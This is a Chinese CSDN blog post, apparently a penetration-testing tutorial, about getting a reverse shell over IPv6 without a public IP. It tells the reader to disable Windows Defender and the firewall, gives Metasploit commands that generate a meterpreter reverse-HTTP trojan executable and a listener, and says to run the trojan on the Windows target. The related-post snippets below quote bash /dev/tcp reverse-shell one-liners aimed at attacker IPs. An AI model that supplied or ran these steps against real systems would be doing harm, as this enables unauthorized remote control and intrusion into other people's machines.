无需公网IP反弹shell

于 2024-08-22 16:33:37 发布
阅读量59 收藏
点赞数 1
文章标签: tcp/ip 服务器 网络协议 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74263993/article/details/141431099
版权

一、准备条件

kali机(网络畅通,具有ipv6地址)

Windows10(关掉病毒实时查杀,尽量别开防火墙)

二、生成木门拿到shell

1.启动kali提权

 2.查看自己的ipv6地址

3.设置msfconsole,生成木马

msfconsole
use payload/windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
# 生成shell
generate -f exe -o shell.exe

4.进行监听

use exploits/multi/handler
set payload windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
exploit

 

5.上传木门到Windows10并运行拿到shell

小黑子不会打篮球
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 952
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹公网服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1197
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
Windows 反弹shell方法
weixin_53747497的博客
07-12 2786
正向shell : 控制端主动发起连接请求去连接被控制端,中间络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
各种shell反弹方法
weixin_46626737的博客
05-16 2670
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
渗透-常用反弹shell方法总结
lza20001103的博客
04-15 2303
渗透-常用反弹shell方法总结
获取主机公网IP
07-31
在IT行业中,获取主机公网IP是一项基础且重要的任务,它涉及到络通信和远程访问等多个领域。公网IP(Public IP)是互联上唯一标识一个设备的地址,与之相对的是私IP(Private IP),通常在局域内部使用。...
公网传文件,无限速,无需公网ip
05-22
1、公网传文件,无需...5、无需什么公网IP,什么ipv4、ipv6都不用考虑 6、增加文件或文件夹映射后分享的地址是固定的,不会随机变动,方便长时间共享文件夹 7、可设置开机启动,随时查看下载多台电脑电脑中的文件
获取公网ip小工具
09-03
标题中的“获取公网IP小工具”指的是一个使用Python编程语言,并结合PyQt5库开发的桌面应用程序。这个小工具的主要功能是查询并显示用户的公网IP地址。公网IP是互联上设备的唯一标识,使得不同络中的设备能够...
android获取公网ip地址 IPUtil.java
11-25
通过异步任务来获取当前用户的ip地址,使用的时候调用getRemoteIP方法就可以,需要传一个可以获取公网ip的url地址,这个百多很多,比如,搜狐,淘宝之类的都有,同时还有一个超时的任务,具体看代码了
腾讯云DDNS脚本,家里是公网IP的宽带可以自动更新公网IP
04-15
在家庭络环境中,如果你的宽带连接是公网IP,这意味着你的IP地址可能会因ISP(互联服务提供商)的重新分配而发生变化。这可能会导致远程访问服务、个人站或NAS设备等基于IP的服务无法正常工作,因为它们依赖于...
记录一次若依后台定时任务命令执行漏洞(不出利用)
就是我的博客
10-25 5795
记录一次若依后台定时任务命令执行漏洞(不出利用)。
反弹shell的各种姿势(linux与windows)
weixin_42478365的博客
06-19 1144
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -
公网ip反弹shell
lq22222的博客
10-06 508
因为在kali虚拟上配置的,想要直接在kali虚拟机上面监听,所以内主机ip地址我们这里选择127.0.0.1,端口任意大数字,我们选择54321,其他都默认,点击确定,这样我们的公网ip就配置好了。相信师傅们在打ctf靶场时都会遇到一个问题,就是部分题目需要一个有公网ip服务器反弹shell,但是vps很难找到免费的;这里就给大家推荐一个好用的平台————贝锐花生壳。映射类型选择TCP,映射模板选择SSH服务,然后外域名下拉就会出现一个随机分配的域名,直接选上即可。此时再看kali终端。
反弹shell常见方法总结
qq_45746681的博客
10-08 763
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
Struts2远程代码执行漏洞
m0_63241485的博客
08-16 940
进入试验机,打开火狐终端firefox访问我们的靶机所在ip地址。通过whoami与id命令,对当前反弹shell的权限进行判断,这里为linux系统最高权限root用户权限.在Linux操作系统中,root的权限是最高的,也被称为超级权限的拥有者。普通用户无法执行的操作,root用户都能完成,所以也被称之为超级管理用户。在所有Linux系统中,系统都是通过UID来区分用户权限级别的,而UID为0的用户被系统约定为是具有超级权限。...
【Try to Hack】无公网ip如何反弹shell
开心星人的博客
06-19 1990
kali端口监听 进行内穿透,下载花生壳(免费的),需要注册才可以下载 https://www.oray.com/ 点击映射数,会跳转到浏览器 点击新增映射 内主机为kali的IP 分配了域名和端口打开一个题目 传参 s546459d57.zicp.fun 23494为分配的域名和端口反弹shell...
反弹shell学习(一):基础反弹姿势
E1even的博客
07-25 1993
文章目录bash反弹:nc反弹:-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结: bash反弹: 这是最常见也是最简单的一种反弹shell的方式,直接看命令: 攻击机:nc -lvp 2333 受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 攻击机: 受害机: 最后攻击机达成的效果: 可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
linux dig域名DNS 查询与iptables域名ip访问流量限制;PTR 反向解析从 IP 地址到域名的映射
最新发布
weixin_42357472的博客
08-19 1313
例如,你可以先查询域名的 IP 地址,然后根据这些 IP 地址设置防火墙规则。是一个强大的命令行工具,用于配置 Linux 内核内置的防火墙,即 Netfilter。在 Linux 系统中,你可以使用多种工具和技术来进行 DNS 查询和 IP 限制。这个命令通常用于阻止特定 IP 地址发出的包含特定字符串的数据包。通过这些方法,你可以在 Linux 系统中实现灵活的 DNS 查询和 IP 限制策略。发出的目标端口为 80(HTTP)的 TCP 数据包,如果这些数据包中包含。命令也可以用于 DNS 查询。
公网实现反弹shell
07-27
公网实现反弹shell的方法有多种。具体要选择哪种方法取决于目标主机的环境和可用工具。如果目标主机上安装有netcat,可以利用netcat反弹shell。如果具有python环境,可以利用python反弹shell。如果具有php环境,可以利用php反弹shell。另外,还可以使用其他工具和技术来实现反弹shell。 举个例子,如果你想在受害机CentOS 7上生成一个反弹shell,连接到宿主机的公网IP地址为10.8.163.224,端口为6666,可以使用以下命令实现端口转发,从而连接到Kali虚拟机上: bash -i >& /dev/tcp/10.8.163.224/6666 0>&1 \[2\] 另外,如果你想利用netcat来实现反弹shell,可以使用Netcat工具。Netcat是一款简单的Unix工具,使用UDP和TCP协议。它可以作为后台操作工具,也可以用作络测试工具或黑客工具。通过使用Netcat,你可以轻松地建立任何连接。\[3\] 需要注意的是,反弹shell是一种潜在的安全风险,应该谨慎使用,并且仅在合法和授权的情况下使用。 #### 引用[.reference_title] - *1* *3* [反弹shell总结](https://blog.csdn.net/weixin_51692662/article/details/127795576)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [如何用内虚拟机kali实现反弹shell](https://blog.csdn.net/qq_44657899/article/details/106307545)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值